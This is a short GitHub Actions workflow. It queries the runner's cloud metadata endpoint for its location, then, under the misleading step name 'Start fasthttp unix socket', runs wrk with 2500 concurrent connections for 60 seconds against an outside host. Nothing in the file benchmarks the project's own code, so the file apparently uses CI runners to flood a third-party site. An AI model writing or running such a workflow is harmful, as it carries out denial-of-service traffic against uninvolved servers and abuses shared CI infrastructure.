name: serversiz
on: workflow_dispatch
jobs:
  server:
    runs-on: ubuntu-24.04-arm
    steps:
      - uses: actions/setup-go@v6
        with:
          go-version: 'stable'
          check-latest: true
      - run: |
          curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/location?api-version=2021-02-01&format=text"
      - name: Start fasthttp unix socket
        run: |
          sudo apt-get install -y wrk
          wrk -t4 -c2500 -d60s http://lscf.eu.cc/
